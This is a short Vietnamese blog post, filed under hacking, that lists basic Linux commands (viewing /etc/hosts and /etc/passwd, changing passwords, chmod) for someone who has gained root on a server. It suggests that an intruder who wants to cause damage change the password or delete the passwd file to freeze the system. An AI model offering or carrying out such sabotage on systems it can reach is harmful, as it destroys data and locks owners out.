cat /etc/syslog.confcat /etc/hosts : xem IP & domain name của server chính

passwd nằm trong thư mục /etc/passwd
Nếu bạn chiếm được quyền root nêu muốn phá có thể thay pass bằng lện
…/#passwd <—- thay pass
hoặc xóa file passwd thì nó đơ toàn bộ luôn
../#cat <—- xem file ( view pass ..#cat passwd)
ls = dir(windows) muốn biết chi tiết thêm –help sau mỗi lện hoặc nhẫn Tab
chmod <– thay quền …

Categories: Hacking Thẻ:
Follow

Get every new post delivered to your Inbox.